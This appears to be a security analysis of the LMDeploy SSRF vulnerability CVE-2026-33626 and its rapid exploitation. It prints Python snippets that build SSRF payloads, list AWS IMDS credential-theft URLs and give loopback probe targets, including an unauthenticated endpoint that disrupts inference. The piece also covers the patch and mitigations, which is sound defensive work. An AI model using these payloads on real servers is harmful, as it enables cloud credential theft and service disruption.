LMDeploy CVE-2026-33626: SSRF Weaponized in 13 Hours

At 3:35 a.m. UTC on April 22, 2026, an attacker began probing a GPU inference server they had never directly accessed. They had no proof-of-concept exploit. What they had was GitHub advisory GHSA-6w67-hwm5-92mq, published 12 hours and 31 minutes earlier, describing a server-side request forgery vulnerability in LMDeploy versions prior to 0.12.3. Over the next eight minutes, they used a vision-language model image loader as a generic HTTP GET primitive to port-scan the internal network, probe AWS credential endpoints, test Redis and MySQL, and attempt to disrupt the inference server’s internal routing. No proof of concept required. The advisory alone was enough.

The Sysdig Threat Research Team, monitoring honeypot systems, logged every request. Their analysis, published this week, is the clearest account yet of how attackers treat AI infrastructure differently from ordinary application servers. CVE-2026-33626 is not unusual as a vulnerability class. SSRF bugs have existed since web servers began making outbound HTTP requests. What makes this case instructive is what SSRF unlocks specifically on a machine built to serve large language models and vision-language systems.

This is not a story about a niche bug in an obscure toolkit. It is a story about a category of deployment that developers treat as research infrastructure, that security teams rarely scan, and that attackers have learned to treat as cloud credential vaults.

What LMDeploy Is and Why It Was Targeted

LMDeploy is an open-source toolkit developed by Shanghai AI Laboratory under the InternLM project. It handles the complete stack for serving large language models and vision-language models: quantization, batching, scheduling, and API delivery via an OpenAI-compatible HTTP endpoint. It supports InternVL, InternLM-XComposer2, and the InternLM text model family. Organizations deploy it on GPU instances to serve model inference to internal applications or external users who need VLM capabilities without provisioning proprietary hosted services.

The toolkit has 7,798 GitHub stars. That figure matters for a specific reason: it is substantial enough to represent genuine production adoption across research institutions, AI startups, and enterprise teams running private inference. It is not substantial enough to appear in CISA’s Known Exploited Vulnerabilities catalog, which functions as the primary automated prioritization signal for enterprise security teams. CVE-2026-33626 does not appear in CISA KEV as of the Sysdig disclosure. The teams most likely to be running LMDeploy are precisely the teams least likely to have flagged it for immediate patching through standard enterprise tooling.

This gap between install base and security tooling coverage is not unique to LMDeploy. It describes a wide category of AI inference and orchestration tools. vLLM, TGI, Ray Serve, and similar frameworks all occupy the same zone: deployed on GPU instances with broad cloud permissions, actively used in production, absent from the CVE scanning workflows that catch enterprise vulnerabilities. When Sysdig says this attack fits a pattern observed repeatedly over the past six months, that is the pattern they are describing.

The Vulnerability: How load_image() Became a Network Probe

The root cause sits in a single function. The load_image() function in lmdeploy/vl/utils.py handles image URLs submitted through LMDeploy’s vision-language API endpoints. When a client sends a chat completion request containing an image URL, load_image() fetches that URL using an HTTP client library. It performs no validation on the destination hostname, IP address, or network range before making the request.

This is textbook server-side request forgery. An attacker sends an API request that looks like a legitimate VLM inference call but points the image URL at an internal network address instead of a real image. The server makes the HTTP request from inside the network perimeter and can return the response content. The attacker never touches the internal network directly. They use the exposed VLM inference endpoint as an HTTP relay.
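A sketch of what such a request looks like. This assumes an OpenAI-compatible chat-completion schema; the exact message structure and the helper function are illustrative, not taken from the attack traffic.

```python
import json


def build_ssrf_payload(model: str, target_url: str) -> str:
    """Build a chat-completion request body whose image URL points at an
    internal host instead of a real image. The server, not the client,
    fetches the URL."""
    body = {
        "model": model,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                # The SSRF vector: this URL is fetched server-side, from
                # inside the network perimeter.
                {"type": "image_url", "image_url": {"url": target_url}},
            ],
        }],
    }
    return json.dumps(body)


payload = build_ssrf_payload(
    "internlm-xcomposer2",
    "http://169.254.169.254/latest/meta-data/",
)
```

To the API surface, this is indistinguishable from an ordinary vision-language inference request until the destination of the image URL is inspected.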

The specific CVE details: versions affected are all LMDeploy releases prior to 0.12.3. The CVSS score is 7.5, classified High severity. The vulnerability requires no authentication beyond the ability to send a chat completion API request, which in many deployments requires only network access to the server’s port. The fix in version 0.12.3 introduces a _is_safe_url() validation function that blocks requests targeting link-local ranges (169.254.0.0/16), loopback addresses (127.0.0.0/8), and RFC 1918 private address space (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Requests pointing at any of these ranges now fail validation before the HTTP client makes contact.

The patch is technically correct. The problem is the window between advisory publication and patch deployment. That window is where attacks happen, and in this case it was 12 hours and 31 minutes.

The Three-Phase Attack: What Sysdig’s Honeypot Captured

The Sysdig Threat Research Team logged the full session: 10 distinct HTTP requests over eight minutes, originating from IP address 103.116.72[.]119, beginning at 3:35 a.m. UTC on April 22, 2026. The attacker did not simply validate the bug and move on. They executed a structured reconnaissance sequence using the VLM image loader as an HTTP GET primitive against the internal network topology.

Phase 1 targeted the AWS Instance Metadata Service. The first requests went to 169.254.169.254, the IMDS endpoint accessible from any process running on an EC2 instance. IMDS returns IAM role credentials in temporary token format, the instance’s region and account ID, network interface configuration, and attached security group information. On an LMDeploy GPU deployment, the IAM role attached to the instance typically carries at minimum S3 read permissions for model artifact buckets. Those credentials are immediately usable. An attacker with IMDS-fetched tokens can authenticate to AWS services as the instance’s role without ever touching the instance itself.
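The lookup chain behind that first phase can be made concrete. The metadata paths below are the documented EC2 IMDS paths; the helper that enumerates them is hypothetical, standing in for whatever tooling the attacker drove the SSRF relay with.

```python
IMDS = "http://169.254.169.254/latest"


def imds_credential_urls(role_name: str) -> list[str]:
    """The URLs an attacker relays through the SSRF primitive, in order,
    to steal the instance role's temporary credentials."""
    return [
        # 1. Enumerate the IAM role names attached to the instance.
        f"{IMDS}/meta-data/iam/security-credentials/",
        # 2. Fetch the temporary AccessKeyId / SecretAccessKey / Token.
        f"{IMDS}/meta-data/iam/security-credentials/{role_name}",
        # 3. Fetch the account ID and region for use with the stolen keys.
        f"{IMDS}/dynamic/instance-identity/document",
    ]
```

Three GET requests, each a plausible-looking "image URL" from the API's perspective, and the attacker can authenticate to AWS as the instance.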

Phase 2 was out-of-band DNS confirmation. The attacker sent a request to an OAST service at requestrepo.com. This out-of-band callback confirmed two things simultaneously: the server could reach arbitrary external hosts (no egress filtering in place), and the attacker’s DNS infrastructure received the lookup (confirming the SSRF was not blind). Standard blind SSRF validation. The attacker now had confirmation of both the vulnerability and the absence of outbound network controls.

Phase 3 was a loopback port sweep completed in 36 seconds. The attacker probed three ports: 6379 (Redis), 3306 (MySQL), and 8080 (HTTP admin). They also sent a request to the path /distserve/p2p_drop_connect. That endpoint belongs to LMDeploy’s disaggregated serving architecture, which separates the prefill and decode phases of inference across different compute units connected by ZMQ inter-process messaging channels. The p2p_drop_connect endpoint has no authentication requirement. Calling it disrupts the ZMQ link between the prefill and decode engines, breaking inference on that routing path.
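The sweep itself reduces to a short list of loopback targets. The port carrying the /distserve path is an assumption here (the write-up does not specify it); the three probed ports match Sysdig's observations.

```python
# Ports Sysdig observed in the 36-second loopback sweep.
SWEPT_PORTS = {6379: "Redis", 3306: "MySQL", 8080: "HTTP admin"}


def loopback_probe_urls() -> list[str]:
    """SSRF target URLs for the observed loopback sweep."""
    urls = [f"http://127.0.0.1:{port}/" for port in sorted(SWEPT_PORTS)]
    # The unauthenticated disaggregated-serving endpoint; port 8080 is an
    # assumption for illustration.
    urls.append("http://127.0.0.1:8080/distserve/p2p_drop_connect")
    return urls
```

Each URL goes out as the image_url field of an otherwise normal chat-completion request; connection success, failure, or banner content leaks back through the server's response behavior.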

Thirty-six seconds for three port probes is scripted behavior, not manual exploration. The attacker had a tool built for this topology. They also rotated between VLM model names in their requests, alternating between internlm-xcomposer2 and OpenGVLab/InternVL2-8B. Sysdig’s assessment is evasion: varying model names to produce traffic patterns resembling legitimate inference requests rather than a single-source automated sweep.

Why AI Inference Nodes Are a Higher-Value SSRF Target Than Application Servers

SSRF vulnerabilities in ordinary web applications typically expose internal HTTP services, database metadata endpoints, or cloud credential APIs. Defenders manage this risk through network segmentation, IMDS protection, and WAF rules. But the defenses built for conventional application servers do not map cleanly to GPU inference deployments. Several properties specific to this class of machine increase the blast radius of SSRF significantly.

IAM roles with direct access to training data and model artifacts. A GPU instance running LMDeploy needs access to model weights. Those weights live in S3. The IAM role attached to the instance carries at minimum S3 read permissions scoped to model artifact buckets, which in many organizations also contain fine-tuning datasets, evaluation data, and customer data used in training runs. IMDS credential theft on an LMDeploy instance does not give an attacker access to a marketing CRM. It gives them access to the organization’s proprietary models and the training data that produced them.

Cross-account AssumeRole chains. Enterprise AI deployments commonly separate inference accounts from data accounts for compliance reasons. An inference account assumes a role in the data account to read model artifacts at inference time. A successful IMDS fetch on an LMDeploy instance can yield credentials that include AssumeRole permissions into production data accounts. One SSRF request against one inference node can become the entry point to a broader account compromise.

In-cluster databases containing operational AI data. The attacker probed Redis on port 6379 and MySQL on port 3306 without any indication those services were externally accessible. LMDeploy’s serving architecture ships with Redis for prompt caching and MySQL for usage metering. Prompt caches in production inference deployments contain user queries and model outputs. Depending on the application, that request-response data can be more commercially sensitive than the model weights themselves.

Unauthenticated internal control plane endpoints. The /distserve/p2p_drop_connect path requires no authentication. It is an internal coordination mechanism designed to be called only within the cluster. Network position was the implied access control. SSRF removes that assumption entirely, making internal endpoints with destructive or administrative capabilities reachable from any API client that can send a chat completion request.

Systematic absence from vulnerability management workflows. LMDeploy does not appear in CISA KEV. It is not a named product in most enterprise vulnerability scanners. Organizations running it are unlikely to have it in their software bill of materials without deliberate AI infrastructure inventory work. The practical consequence is that a security team that patches Apache httpd within 48 hours of a CVE may leave LMDeploy running a vulnerable version for months, not because they have decided to accept the risk, but because their tooling does not surface it as a tracked asset.

What the Fix in 0.12.3 Does and Does Not Solve

The _is_safe_url() check added in LMDeploy 0.12.3 closes the specific exploitation vector Sysdig observed. Requests targeting IMDS (169.254.169.254), loopback ports (127.0.0.0/8), and private ranges (10/8, 172.16/12, 192.168/16) now fail before the HTTP client executes.
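A minimal reimplementation of that kind of check, using the standard library's ipaddress module. This is illustrative of the approach, not the actual patch, and it deliberately skips the hard parts a production check must handle: resolving hostnames to IPs before deciding, and re-validating after redirects (otherwise a public hostname can still resolve or redirect to an internal address).

```python
import ipaddress
from urllib.parse import urlparse

BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),  # link-local, including IMDS
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("10.0.0.0/8"),      # RFC 1918 private ranges
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_safe_url(url: str) -> bool:
    """Reject URLs whose host is a literal IP in a blocked range."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostname, not an IP literal. A real check must resolve it and
        # test the resulting addresses too; allowing it here is the gap.
        return True
    return not any(addr in net for net in BLOCKED_NETWORKS)
```

With this in place, the requests Sysdig observed in all three phases fail before any socket opens.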

The fix does not address the architectural question underneath the vulnerability: should an inference server make arbitrary outbound HTTP requests at all? Vision-language models that accept image URLs from API clients must fetch those URLs somehow. The current design fetches them inside the inference server process, from the same network context that has IAM role access, Redis access, and ZMQ process access. A hardened design would route image fetching through a dedicated proxy service that has access only to the public internet and nothing else. The inference server calls the proxy with the URL. The proxy fetches the image. The proxy has no access to IMDS, internal databases, or control planes.
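The delegation can be sketched in a few lines. The proxy hostname and its fetch API below are hypothetical; the point is that the inference process composes a request to the proxy rather than opening the outbound socket itself.

```python
import json
import urllib.request

# Hypothetical egress-only fetch service: it has a route to the public
# internet and nothing else -- no IMDS, no Redis, no control plane.
FETCH_PROXY = "http://image-fetch-proxy.internal:9000/fetch"


def build_proxy_fetch_request(image_url: str) -> urllib.request.Request:
    """Compose the request the inference server sends to the proxy instead
    of fetching the client-supplied URL directly."""
    return urllib.request.Request(
        FETCH_PROXY,
        data=json.dumps({"url": image_url}).encode(),
        headers={"Content-Type": "application/json"},
    )
```

Even if URL validation on the proxy is imperfect, the network position the attacker reaches is a host with nothing worth stealing.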

This architecture is operationally more complex, but it eliminates the vulnerability class rather than patching one instance of it. For teams that cannot immediately upgrade to 0.12.3, Sysdig recommends applying IMDSv2 enforcement on GPU instances. IMDSv2 requires session-oriented tokens for metadata service access, raising the credential theft bar from a single HTTP GET to a two-step request sequence requiring a PUT to obtain a session token first. Combined with setting the metadata HTTP hop limit to 1, which blocks container processes from reaching IMDS unless the container is the EC2 instance itself, IMDSv2 substantially reduces blast radius while the patch deploys.
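The two-step flow IMDSv2 requires is what defeats a bare SSRF GET. Sketched with the standard library below; the requests are only composed, not sent, since running them on an EC2 instance would return live credentials.

```python
import urllib.request

IMDS = "http://169.254.169.254/latest"


def imdsv2_requests(ttl_seconds: int = 21600):
    """Compose the two requests IMDSv2 demands. Step 1 is a PUT, which a
    GET-only SSRF primitive like the load_image() relay cannot perform."""
    token_req = urllib.request.Request(
        f"{IMDS}/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )
    # Step 2: metadata access only succeeds with the session token attached.
    meta_req = urllib.request.Request(
        f"{IMDS}/meta-data/iam/security-credentials/",
        headers={"X-aws-ec2-metadata-token": "<token-from-step-1>"},
    )
    return token_req, meta_req
```

Against this flow, the Phase 1 requests Sysdig logged would have returned 401 responses instead of role credentials.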

What the 12-Hour Exploitation Window Means for AI Infrastructure Teams

Sysdig describes CVE-2026-33626 as fitting a pattern repeated across the AI infrastructure space over the past six months. Inference servers, model gateways, and agent orchestration frameworks are being weaponized within hours of advisory publication, regardless of install base size. LMDeploy’s 7,798 stars did not make it a less attractive target. The tool runs on GPU instances with broad cloud permissions. That is the signal that matters to attackers scanning GitHub advisories.

This pattern intersects with a finding from OX Security’s 2026 analysis of 216 million security findings across 250 organizations: critical vulnerability density grew by 400 percent year-over-year in environments with high AI coding tool adoption. The velocity gap is not just attackers moving faster. It is defenders moving slower relative to their own expanding deployment surface. AI coding tools generate new infrastructure. That infrastructure gets deployed without the security review cadence that traditional application code receives. The result is a growing body of production systems that are genuinely unknown to the security teams responsible for protecting them.

The combination of expanding MCP server ecosystems with 97 million monthly SDK downloads, inference frameworks like LMDeploy, and agent orchestration tools creates an attack surface that standard enterprise security tooling was not built to see. The REF6598 attack on Obsidian’s plugin model earlier this month demonstrated the same structural problem in a different tool category: extensible developer software deployed with high trust and low security review.

The difference with AI inference infrastructure is the blast radius. A compromised Obsidian plugin reaches the local filesystem. A compromised LMDeploy instance reaches IAM role credentials, training datasets, and cross-account access chains.

Immediate Actions for Teams Running AI Inference Infrastructure

Update to LMDeploy 0.12.3 immediately. The patch is available, targeted, and straightforward to deploy. Treat this as a same-week update regardless of whether enterprise vulnerability tooling has surfaced it. The exploitation timeline shows that waiting for automated prioritization signals is not safe for AI infrastructure CVEs.

Enforce IMDSv2 on all GPU inference instances. The AWS CLI command: aws ec2 modify-instance-metadata-options --instance-id [INSTANCE_ID] --http-tokens required --http-put-response-hop-limit 1. Apply this to every instance running AI inference software, not just LMDeploy deployments. The same IMDS exposure exists wherever an inference framework makes outbound HTTP requests without egress filtering.

Apply egress network filtering on inference nodes. The inference API endpoint does not need direct access to Redis, MySQL, internal HTTP control planes, or link-local address ranges. Segment those services behind a separate network boundary that the inference API surface cannot reach. This is standard network segmentation applied to a workload class that frequently skips it because it is treated as research infrastructure rather than production service.

Inventory AI inference tooling in your software bill of materials. If LMDeploy, vLLM, TGI, Ray Serve, or any inference framework runs in your environment, it should appear in SBOM tracking and be covered by vulnerability scanning. Building that inventory requires deliberate effort; it will not happen automatically through the tooling that handles conventional application dependencies.

The measurement unit for response time on AI infrastructure CVEs is hours. Twelve hours and 31 minutes from disclosure to active exploitation of CVE-2026-33626 is the concrete data point. Monthly patch cycles and weekly scan cadences are not adequate controls for this class of vulnerability in this class of infrastructure.
